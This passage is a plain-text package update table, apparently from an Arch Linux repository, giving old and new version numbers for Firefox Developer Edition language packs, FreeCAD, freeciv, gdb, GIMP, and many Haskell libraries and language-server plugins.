   firefox-developer-edition-i18n-bg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-br            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-bs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ca-valencia      150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-cak            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-cy            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-da            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-de            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-dsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-el            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-ca            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-gb            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-en-us            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eo            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-ar            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-cl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-es            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-es-mx            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-et            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-eu            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fa            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ff            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-fr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-fur            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-fy-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ga-ie            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gd            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-gn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-gu-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-he            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hi-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-hsb            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-hu            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-hy-am            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ia            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-id            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-is            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-it            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ja            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ka            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-kab            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-km            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-kn            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ko            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-lij            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-lv            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-mr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ms            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-my            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nb-no            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-ne-np            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-nl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-nn-no            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-oc            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pa-in            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-pl            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-br            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-pt-pt            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-rm            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ro            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ru            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sat            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sc            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-sco            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-si            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sk            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-skr            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sl            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-son            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sq            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-sr            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-sv-se            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-szl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ta            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-te            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tg            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-th            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tl            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-tr            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-trs            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uk            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ur            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-uz            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-vi            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-xh            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-cn            150.0b2-1            150.0b3-1
firefox-developer-edition-i18n-zh-tw            150.0b2-1            150.0b3-1
                             freecad             1.0.2-10              1.1.0-2
                      freeciv-common              3.2.2-6              3.2.4-1
                        freeciv-gtk3              3.2.2-6              3.2.4-1
                        freeciv-gtk4              3.2.2-6              3.2.4-1
                          freeciv-qt              3.2.2-6              3.2.4-1
                           ft2-clone               2.12-1               2.13-1
                                 gdb               17.1-2               17.1-3
                          gdb-common               17.1-2               17.1-3
                                gegl             0.4.68-1             0.4.70-1
                          gemini-cli           1:0.35.2-1           1:0.35.3-1
                                gimp              3.2.0-1              3.2.2-1
                           git-annex       10.20251215-14       10.20251215-19
                           git-delta             0.19.1-1             0.19.2-1
                          git-repair       1.20230814-189       1.20230814-190
                               gitit         0.15.1.2-121         0.15.1.2-127
                             glances              4.5.2-2              4.5.3-1
                               glirc            2.40.1-70            2.40.1-74
           globalprotect-openconnect              2.5.1-2              2.5.1-3
                                  gn    0.2324.304bbef6-1    0.2324.304bbef6-2
                      gnuradio-iqbal             0.38.3-2             0.38.3-3
                       golangci-lint             2.11.3-1             2.11.4-1
                         google-glog              0.7.1-1              0.7.1-2
                                grpc             1.78.1-2             1.80.0-1
                            grpc-cli             1.78.1-2             1.80.0-1
                                gvim           9.2.0204-2           9.2.0272-1
                              hamlib              4.6.5-3              4.7.0-1
                           hardinfo2             2.2.16-1             2.2.16-2
                 haskell-adjunctions            4.4.3-102              4.4.4-1
                       haskell-aeson            2.2.1.0-5            2.2.1.0-7
         haskell-aeson-better-errors           0.9.1.3-73           0.9.1.3-75
                haskell-aeson-casing          0.2.0.0-233          0.2.0.0-235
                  haskell-aeson-diff         1.1.0.13-267         1.1.0.13-269
                haskell-aeson-pretty           0.8.10-150           0.8.10-152
                    haskell-aeson-qq            0.8.4-335            0.8.4-337
        haskell-aeson-warning-parser             0.1.1-89             0.1.1-91
                  haskell-aeson-yaml          1.1.0.1-349          1.1.0.1-351
                haskell-apply-refact          0.14.0.0-63          0.14.0.0-64
                    haskell-arch-web             0.3.2-54             0.3.2-58
                    haskell-arithmoi          0.13.2.0-32          0.13.2.0-35
            haskell-attoparsec-aeson            2.2.0.0-7            2.2.0.0-9
                haskell-authenticate          1.3.5.2-250          1.3.5.2-253
          haskell-authenticate-oauth              1.7-373              1.7-375
                         haskell-aws             0.24.2-9            0.24.2-12
              haskell-binary-conduit            1.3.1-588            1.3.1-590
            haskell-binary-instances            1.0.4-161            1.0.4-163
               haskell-binary-tagged            0.3.1-332            0.3.1-334
                      haskell-bitvec           1.1.5.0-43           1.1.5.0-45
                  haskell-bower-json          1.1.0.0-229          1.1.0.0-231
                  haskell-breakpoint           0.1.4.0-20            0.1.5.0-1
                     haskell-butcher          1.3.3.2-508          1.3.3.2-510
                    haskell-bv-sized             1.0.6-96             1.0.6-99
                  haskell-byte-order          0.1.3.1-161          0.1.3.1-163
   haskell-bytestring-strict-builder           0.4.5.8-76           0.4.5.8-78
       haskell-cabal-install-parsers           0.6.1.1-12           0.6.1.1-16
                 haskell-casa-client             0.0.3-32             0.0.3-36
                  haskell-casa-types             0.0.3-24             0.0.3-27
                       haskell-cborg          0.2.10.0-86          0.2.10.0-88
                  haskell-cborg-json          0.2.6.0-101          0.2.6.0-103
                  haskell-cheapskate          0.1.1.2-861          0.1.1.2-864
                    haskell-checkers            0.6.0-257            0.6.0-258
                     haskell-chimera          0.4.1.0-144          0.4.1.0-146
                          haskell-ci            0.16.6-48            0.16.6-52
                    haskell-citeproc           0.8.1.1-84           0.8.1.1-86
                   haskell-clash-lib             1.8.2-97            1.8.2-100
               haskell-clash-prelude             1.8.2-89             1.8.2-92
              haskell-classy-prelude           1.5.0.3-81           1.5.0.3-84
                haskell-coinbase-pro          0.9.3.2-435          0.9.3.2-439
       haskell-commonmark-extensions            0.2.5.6-5            0.2.5.6-6
           haskell-commonmark-pandoc           0.2.2.3-46           0.2.2.3-48
                     haskell-concise          0.1.0.1-660          0.1.0.1-662
                     haskell-conduit          1.3.6.1-133          1.3.6.1-135
               haskell-conduit-extra             1.3.8-76             1.3.8-78
               haskell-conduit-parse          0.2.1.1-311          0.2.1.1-313
               haskell-config-schema          1.3.0.0-234          1.3.0.0-236
          haskell-constraints-extras           0.4.0.2-54           0.4.0.2-56
               haskell-contravariant              1.5.5-6              1.5.6-1
        haskell-contravariant-extras            0.3.5.4-6            0.3.5.4-7
                   haskell-criterion           1.6.3.0-47           1.6.3.0-49
       haskell-criterion-measurement           0.2.3.0-57           0.2.3.0-59
             haskell-crypton-conduit            0.2.3-219            0.2.3-221
          haskell-crypton-connection             0.4.5-26             0.4.5-28
          haskell-cryptonite-conduit            0.2.2-792            0.2.2-794
                         haskell-dav            1.3.4-874            1.3.4-879
                        haskell-dbus             1.3.3-73             1.3.3-76
               haskell-dbus-hslogger          0.1.0.1-676          0.1.0.1-679
              haskell-deferred-folds           0.9.18.8-2           0.9.18.8-4
        haskell-dense-linear-algebra          0.1.0.0-444          0.1.0.0-446
               haskell-dependent-map            0.4.0.1-9           0.4.0.1-11
               haskell-dependent-sum          0.7.2.0-219          0.7.2.0-221
      haskell-dependent-sum-template           0.2.0.2-17           0.2.0.2-19
                       haskell-deque          0.4.4.2-114          0.4.4.2-116
              haskell-deriving-aeson           0.2.10-131           0.2.10-133
                      haskell-docopt          0.7.0.8-151          0.7.0.8-153
                haskell-doctemplates          0.11.0.1-76          0.11.0.1-78
            haskell-doctest-discover          0.2.0.0-213          0.2.0.0-215
                      haskell-either             5.0.3-79             5.0.3-80
                  haskell-enummapset          0.7.3.0-139          0.7.3.0-141
                   haskell-esqueleto           3.5.11.0-8           3.5.11.1-4
                  haskell-fdo-notify            0.3.1-922            0.3.1-925
                        haskell-feed          1.3.2.1-330          1.3.2.1-332
                    haskell-floskell           0.10.8-189           0.10.8-191
                       haskell-focus          1.0.3.2-186          1.0.3.2-188
                       haskell-foldl            1.4.18-93            1.4.18-94
                    haskell-fourmolu           0.13.1.0-5           0.14.0.0-2
                        haskell-free              5.2-124              5.2-125
                    haskell-fsnotify           0.4.4.0-40           0.4.4.0-42
                haskell-generic-data           1.1.0.2-66           1.1.0.2-68
                haskell-generic-lens          2.2.2.0-200          2.2.2.0-202
                   haskell-ghc-check          0.5.0.8-150          0.5.0.8-151
              haskell-ghc-exactprint            1.7.1.0-9           1.7.1.0-10
                      haskell-ghcide           2.2.0.0-16            2.3.0.0-5
           haskell-ghcide-test-utils          1.9.0.0-292          1.9.0.0-299
                          haskell-gi           0.26.16-10           0.26.16-12
                      haskell-gi-atk            2.0.28-38            2.0.28-40
                    haskell-gi-cairo            1.0.30-31            1.0.30-33
          haskell-gi-cairo-connector            0.1.1-313            0.1.1-315
                 haskell-gi-dbusmenu            0.4.14-33            0.4.14-35
             haskell-gi-dbusmenugtk3           0.4.15-130           0.4.15-132
                haskell-gi-freetype2             2.0.5-41             2.0.5-43
                      haskell-gi-gdk            4.0.9-106            4.0.9-108
                     haskell-gi-gdk3            3.0.29-30            3.0.29-32
                  haskell-gi-gdk3x11             3.0.15-6             3.0.16-1
                haskell-gi-gdkpixbuf           2.0.32-142           2.0.32-144
                   haskell-gi-gdkx11            4.0.8-129            4.0.8-131
                      haskell-gi-gio            2.0.38-25            2.0.38-27
                     haskell-gi-glib            2.0.30-59            2.0.30-61
                  haskell-gi-gmodule             2.0.6-43             2.0.6-45
                  haskell-gi-gobject            2.0.31-75            2.0.31-77
                 haskell-gi-graphene             1.0.8-68             1.0.8-70
                      haskell-gi-gsk             4.0.8-55             4.0.8-57
                      haskell-gi-gtk            4.0.11-32            4.0.11-34
                   haskell-gi-gtk-hs           0.3.17-101           0.3.17-103
                     haskell-gi-gtk3            3.0.43-13            3.0.43-15
                 haskell-gi-harfbuzz           0.0.10-147           0.0.10-149
                    haskell-gi-pango            1.0.30-36            1.0.30-38
                     haskell-gi-xlib            2.0.14-93            2.0.14-95
                     haskell-git-lfs             1.2.5-78             1.2.5-81
                     haskell-githash          0.1.6.3-345          0.1.6.3-348
                haskell-gtk-sni-tray          0.1.8.1-394          0.1.8.1-397
                   haskell-gtk-strut          0.1.3.2-348          0.1.3.2-350
                  haskell-hackage-db            2.1.3-191            2.1.3-193
            haskell-hackage-security           0.6.3.2-13           0.6.3.2-15
             haskell-haddock-library           1.11.0-184           1.11.0-188
                     haskell-hadrian     0.1.0.0+9.6.6-16     0.1.0.0+9.6.6-19
                      haskell-hakyll          4.16.4.0-25          4.16.4.0-31
            haskell-happstack-server             7.9.3-24             7.9.3-25
                       haskell-hasql          1.5.0.5-114            1.6.1.1-2
    haskell-hasql-dynamic-statements          0.3.1.1-280            0.3.1.2-2
             haskell-hasql-implicits          0.1.0.5-316          0.1.0.5-320
         haskell-hasql-notifications           0.2.0.5-89           0.2.0.5-93
                  haskell-hasql-pool          0.5.2.2-399            0.8.0.2-2
           haskell-hasql-transaction          1.0.1.1-421            1.0.1.2-2
            haskell-hedgehog-classes          0.2.5.4-216          0.2.5.4-218
                        haskell-here           1.2.14-135           1.2.14-136
                    haskell-hie-bios           0.12.0-159           0.12.0-161
                 haskell-hledger-lib               1.52-6               1.52-8
haskell-hls-alternate-number-format-plugin     2.2.0.0-16            2.3.0.0-5
        haskell-hls-cabal-fmt-plugin           2.2.0.0-16            2.3.0.0-5
            haskell-hls-cabal-plugin           2.2.0.0-16            2.3.0.0-5
   haskell-hls-call-hierarchy-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-change-type-signature-plugin       2.2.0.0-16            2.3.0.0-5
            haskell-hls-class-plugin           2.2.0.0-16            2.3.0.0-5
       haskell-hls-code-range-plugin           2.2.0.0-16            2.3.0.0-5
             haskell-hls-eval-plugin           2.2.0.0-16            2.3.0.0-5
  haskell-hls-explicit-fixity-plugin           2.2.0.0-16            2.3.0.0-5
 haskell-hls-explicit-imports-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-explicit-record-fields-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-floskell-plugin           2.2.0.0-16            2.3.0.0-5
         haskell-hls-fourmolu-plugin           2.2.0.0-17            2.3.0.0-5
             haskell-hls-gadt-plugin           2.2.0.0-17            2.3.0.0-5
                   haskell-hls-graph           2.2.0.0-12            2.3.0.0-4
            haskell-hls-hlint-plugin           2.2.0.0-16            2.3.0.0-5
      haskell-hls-module-name-plugin           2.2.0.0-16            2.3.0.0-5
           haskell-hls-ormolu-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-overloaded-record-dot-plugin       2.2.0.0-16            2.3.0.0-5
              haskell-hls-plugin-api           2.2.0.0-15            2.3.0.0-4
          haskell-hls-pragmas-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-qualify-imported-names-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-refactor-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-rename-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-retrie-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-splice-plugin           2.2.0.0-17            2.3.0.0-5
  haskell-hls-stylish-haskell-plugin           2.2.0.0-16            2.3.0.0-5
              haskell-hls-test-utils           2.2.0.0-16            2.3.0.0-5
                     haskell-hoauth2            2.14.0-16            2.14.0-19
                    haskell-hopenpgp           2.10.1-121           2.10.1-124
                       haskell-hpack            0.38.0-21            0.38.0-24
                       haskell-hslua            2.3.0-203            2.3.0-206
                 haskell-hslua-aeson           2.3.1.1-51           2.3.1.1-54
               haskell-hslua-classes             2.3.1-30             2.3.1-31
                  haskell-hslua-core             2.3.2-34             2.3.2-35
                  haskell-hslua-list             1.1.4-29             1.1.4-30
           haskell-hslua-marshalling            2.3.1-141            2.3.1-142
      haskell-hslua-module-doclayout             1.2.0-11             1.2.0-14
           haskell-hslua-module-path            1.1.1-105            1.1.1-108
         haskell-hslua-module-system             1.1.2-54             1.1.2-55
           haskell-hslua-module-text          1.1.0.1-168          1.1.0.1-169
        haskell-hslua-module-version            1.1.1-147            1.1.1-150
            haskell-hslua-module-zip             1.1.3-47             1.1.3-48
     haskell-hslua-objectorientation             2.3.1-49             2.3.1-50
             haskell-hslua-packaging            2.3.1-151            2.3.1-152
                  haskell-hslua-repl            0.1.2-147            0.1.2-148
                haskell-hslua-typing            0.1.1-143            0.1.1-144
                   haskell-hspec-wai           0.11.1-639           0.11.1-642
              haskell-hspec-wai-json           0.11.0-710           0.11.0-713
                haskell-hsyaml-aeson           0.2.0.2-58           0.2.0.2-60
                         haskell-htf          0.15.0.2-68          0.15.0.2-70
                haskell-html-conduit          1.3.2.2-388          1.3.2.2-390
                        haskell-http         4000.4.1-398         4000.4.1-401
                 haskell-http-client            0.7.19-58            0.7.19-60
      haskell-http-client-restricted            0.1.0-198            0.1.0-201
             haskell-http-client-tls          0.3.6.4-137          0.3.6.4-140
                haskell-http-conduit          2.3.9.1-197          2.3.9.1-200
               haskell-http-download          0.2.1.0-327          0.2.1.0-330
                haskell-http-streams          0.8.9.9-292          0.8.9.9-295
                       haskell-http2             5.1.0-17             5.1.0-19
                       haskell-http3             0.0.9-21             0.0.9-23
                  haskell-httpd-shed          0.4.1.2-108          0.4.1.2-109
               haskell-hw-fingertree          0.1.2.1-194          0.1.2.1-196
           haskell-hw-hspec-hedgehog          0.1.1.1-213          0.1.1.1-215
                     haskell-hw-prim          0.6.3.2-213          0.6.3.2-215
                         haskell-hxt         9.3.1.22-234         9.3.1.22-235
                haskell-implicit-hie           0.1.4.0-78           0.1.4.0-80
         haskell-implicit-hie-cradle          0.5.0.1-192          0.5.0.1-194
          haskell-incremental-parser            0.5.1-166            0.5.1-167
   haskell-insert-ordered-containers          0.2.5.3-200          0.2.5.3-203
                 haskell-interpolate            0.2.1-468            0.2.1-469
    haskell-interpolatedstring-perl6            1.0.2-405            1.0.2-406
                   haskell-invariant             0.6.4-94             0.6.4-95
                       haskell-ipynb              0.2-283              0.2-285
              haskell-ipython-kernel           0.12.0.0-8          0.12.0.0-10
           haskell-isomorphism-class             0.1.1-92             0.1.1-94
                 haskell-ixset-typed          0.5.1.0-314          0.5.1.0-316
                        haskell-jose             0.10-256             0.10-259
                   haskell-js-jquery            3.7.1-107            3.7.1-110
              haskell-kan-extensions             5.2.7-85             5.2.7-87
                        haskell-keys             3.12.5-5             3.12.5-6
                    haskell-kvitable            1.1.1.1-7           1.1.1.1-10
           haskell-lambdabot-trusted          5.3.1.2-244          5.3.1.2-247
                  haskell-lambdahack         0.11.0.1-190         0.11.0.1-193
             haskell-language-server           2.2.0.0-19            2.3.0.0-5
                    haskell-lattices             2.2.1-96             2.2.1-97
                        haskell-lens              5.3.4-1              5.3.4-3
                 haskell-lens-action            0.2.6-329            0.2.6-331
                  haskell-lens-aeson            1.2.3-202            1.2.3-205
                     haskell-libyaml            0.1.4-161            0.1.4-163
                      haskell-linear            1.23.2-47            1.23.2-49
                      haskell-list-t           1.0.5.7-63           1.0.5.7-65
                    haskell-lrucache           1.2.0.1-26           1.2.0.1-27
                         haskell-lsp           2.2.0.0-10           2.2.0.0-13
                    haskell-lsp-test          0.16.0.0-11          0.16.0.0-14
                   haskell-lsp-types            2.0.2.0-9           2.0.2.0-12
               haskell-lua-arbitrary          1.0.1.1-135            1.0.1.2-1
                  haskell-lumberjack          1.0.3.0-172          1.0.3.0-173
                  haskell-microaeson           0.1.0.3-43           0.1.0.3-45
             haskell-microlens-aeson            2.5.2-151            2.5.2-153
                 haskell-microstache          1.0.2.3-212          1.0.2.3-214
                  haskell-mime-types            0.1.2.0-4            0.1.2.1-1
                       haskell-mmark          0.0.7.6-346          0.0.7.6-348
                         haskell-mod           0.2.1.0-30           0.2.1.0-32
                  haskell-modern-uri          0.3.6.1-147          0.3.6.1-148
              haskell-monad-dijkstra          0.1.1.5-193          0.1.1.5-195
                haskell-monad-logger           0.3.42-113           0.3.42-115
            haskell-mono-traversable         1.0.21.0-135         1.0.21.0-137
  haskell-mono-traversable-instances          0.1.1.0-386          0.1.1.0-389
                    haskell-mustache           2.4.3.1-72           2.4.3.1-76
          haskell-mutable-containers          0.3.4.1-242          0.3.4.1-244
                  haskell-named-text           1.2.2.0-13           1.2.2.0-16
          haskell-neat-interpolation          0.5.1.4-199          0.5.1.4-201
                 haskell-network-uri          2.6.4.2-137          2.6.4.2-138
                        haskell-oeis           0.3.10.2-6           0.3.10.2-9
                   haskell-one-liner              2.1.1-2              2.1.1-3
             haskell-optparse-simple          0.1.1.4-535          0.1.1.4-538
                      haskell-ormolu           0.6.0.0-13           0.6.0.0-15
                       haskell-pager          0.1.1.0-218          0.1.1.0-220
                      haskell-pandoc               3.5-12                3.6-2
           haskell-pandoc-lua-engine             0.3.3-14                0.4-2
          haskell-pandoc-lua-marshal             0.2.9-15              0.3.0-1
               haskell-pandoc-server           0.1.0.10-3           0.1.0.10-9
                haskell-pandoc-types           1.23.1-164           1.23.1-166
                      haskell-pantry           0.8.2.2-32           0.8.2.2-36
         haskell-parameterized-utils           2.1.11.0-9          2.1.11.0-12
                        haskell-path              0.9.6-9             0.9.6-11
                     haskell-path-io            1.8.2-140            1.8.2-142
                  haskell-persistent          2.14.5.2-58          2.14.5.2-61
            haskell-persistent-mysql         2.13.1.5-100         2.13.1.5-103
       haskell-persistent-postgresql          2.13.5.2-24          2.13.5.2-27
               haskell-persistent-qq          2.12.0.7-73          2.12.0.7-76
           haskell-persistent-sqlite          2.13.1.1-66          2.13.1.1-69
             haskell-persistent-test         2.13.1.3-208         2.13.1.3-211
                  haskell-pipes-http            1.0.6-770            1.0.6-773
                     haskell-pointed            5.0.5-125            5.0.5-127
           haskell-postgresql-binary           0.12.5-267           0.12.5-270
           haskell-postgresql-simple          0.6.5.1-112          0.6.5.1-114
        haskell-prettyprinter-interp          0.2.0.0-157          0.2.0.0-158
                   haskell-prim-uniq              0.2-250              0.2-252
            haskell-primitive-extras         0.10.2.2-131         0.10.2.2-134
                 haskell-profunctors             5.6.3-82             5.6.3-83
            haskell-project-template          0.2.1.0-508          0.2.1.0-510
                         haskell-ptr         0.16.8.7-128         0.16.8.7-130
                        haskell-quic             0.1.27-3             0.1.27-5
          haskell-quickcheck-classes          0.6.5.0-342          0.6.5.0-344
                         haskell-ral             0.2.2-54             0.2.2-56
                      haskell-rebase            1.20.2-14            1.20.2-16
                   haskell-recaptcha          0.1.0.4-379          0.1.0.4-382
           haskell-recursion-schemes            5.2.3-141            5.2.3-142
                    haskell-reducers           3.12.5-125           3.12.5-126
                    haskell-refinery          0.4.0.0-317          0.4.0.0-318
                         haskell-req            3.13.4-32            3.13.4-35
                        haskell-rere           0.2.0.2-13           0.2.0.2-15
                    haskell-rerebase            1.20.2-14            1.20.2-16
                      haskell-retrie            1.2.3-159            1.2.3-161
                 haskell-rio-orphans          0.1.2.0-486          0.1.2.0-488
             haskell-rio-prettyprint           0.1.8.0-69           0.1.8.0-71
                   haskell-row-types           1.0.1.2-66           1.0.1.2-68
                    haskell-safecopy          0.10.4.3-57          0.10.4.3-59
                       haskell-sandi              0.5-597              0.5-599
                    haskell-sandwich           0.2.2.0-20           0.2.2.0-22
                      haskell-scotty             0.22-203             0.22-206
                        haskell-sdl2          2.5.5.1-128          2.5.5.1-131
                    haskell-sdl2-ttf            2.1.3-278            2.1.3-281
                   haskell-semialign             1.3.1-58             1.3.1-59
               haskell-semigroupoids              6.0.2-3              6.0.2-4
                   haskell-serialise          0.2.6.1-174          0.2.6.1-176
                     haskell-servant          0.20.3.0-52          0.20.3.0-54
              haskell-servant-client          0.20.3.0-67          0.20.3.0-71
         haskell-servant-client-core          0.20.3.0-52          0.20.3.0-54
              haskell-servant-server          0.20.3.0-67          0.20.3.0-70
             haskell-servant-swagger            1.2.1-153            1.2.1-156
                       haskell-shake           0.19.6-387           0.19.6-390
                 haskell-shakespeare             2.1.7-14            2.1.7.1-2
             haskell-simple-sendfile           0.2.32-196           0.2.32-198
                 haskell-skylighting             0.14.4-3             0.14.4-5
            haskell-skylighting-core             0.14.4-3             0.14.4-5
     haskell-skylighting-format-ansi              0.1-293              0.1-295
haskell-skylighting-format-blaze-html         0.1.1.3-147          0.1.1.3-149
  haskell-skylighting-format-context          0.1.0.2-257          0.1.0.2-259
    haskell-skylighting-format-latex              0.1-292              0.1-294
                   haskell-snap-core          1.0.5.1-210          1.0.5.1-211
                 haskell-snap-server          1.1.2.1-362          1.1.2.1-365
                   haskell-sourcemap            0.1.7-299            0.1.7-301
                    haskell-src-meta            0.8.15-90            0.8.15-91
                  haskell-statistics           0.16.4.0-9          0.16.4.0-11
        haskell-status-notifier-item            0.3.2.0-2            0.3.2.0-5
              haskell-stm-containers          1.2.1.1-160          1.2.1.1-164
                    haskell-stm-hamt          1.2.1.1-132              1.2.2-3
                       haskell-store           0.7.20-137           0.7.20-139
                     haskell-streams            3.3.3-125            3.3.3-127
                 haskell-strict-list          0.1.7.6-132          0.1.7.6-134
          haskell-string-interpolate          0.3.4.0-143          0.3.4.0-144
                  haskell-structured            0.1.1-319            0.1.1-321
                    haskell-summoner            2.1.0.0-2            2.1.0.0-6
                haskell-summoner-tui            2.1.0.0-2            2.1.0.0-6
                    haskell-swagger2            2.8.10-98           2.8.10-101
           haskell-tagstream-conduit            0.5.6-536            0.5.6-538
haskell-tamarin-prover-accountability            1.12.0-6             1.12.0-8
       haskell-tamarin-prover-export             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-sapic             1.12.0-6             1.12.0-8
         haskell-tamarin-prover-term             1.12.0-6             1.12.0-8
       haskell-tamarin-prover-theory             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-utils             1.12.0-6             1.12.0-8
                 haskell-tar-conduit            0.4.1-191            0.4.1-193
             haskell-tasty-checklist           1.0.8.0-10           1.0.8.0-13
                 haskell-tasty-hslua            1.1.1-139            1.1.1-140
                   haskell-tasty-lua           1.1.1.1-72           1.1.1.1-73
                 haskell-tasty-sugar           2.2.2.1-85           2.2.2.1-88
                     haskell-tdigest            0.3.1-150            0.3.1-152
                     haskell-texmath         0.12.8.11-15          0.12.8.12-1
                haskell-text-builder            0.6.7-283            0.6.7-285
            haskell-text-builder-dev          0.3.3.2-244          0.3.3.2-246
                   haskell-th-compat             0.1.6-87              0.1.7-1
                  haskell-th-desugar               1.16-3               1.16-4
                      haskell-th-env            0.1.1-164            0.1.1-165
                  haskell-th-orphans            0.13.17-4            0.13.17-5
                haskell-th-utilities          0.2.5.2-102          0.2.5.2-103
                         haskell-tls             2.0.6-71             2.0.6-73
         haskell-tls-session-manager             0.0.6-21             0.0.6-23
                   haskell-tree-diff          0.3.0.1-229              0.3.1-3
                    haskell-trifecta            2.1.4-174            2.1.4-176
                      haskell-turtle            1.6.2-161            1.6.2-162
                       haskell-typst               0.6-19              0.6.1-1
               haskell-typst-symbols              0.1.6-2              0.1.7-1
        haskell-uri-bytestring-aeson          0.1.0.9-133          0.1.0.9-135
                  haskell-uri-encode          1.5.0.7-319          1.5.0.7-320
                         haskell-vec             0.5.1-52             0.5.1-54
           haskell-vector-algorithms          0.9.1.0-123          0.9.1.0-125
              haskell-vector-builder          0.3.8.6-139          0.3.8.6-141
            haskell-vector-instances             3.4.3-77             3.4.3-79
                haskell-vector-sized            1.6.1-155            1.6.1-157
            haskell-wai-app-file-cgi            3.1.11-20            3.1.11-23
              haskell-wai-app-static            3.1.9-233            3.1.9-236
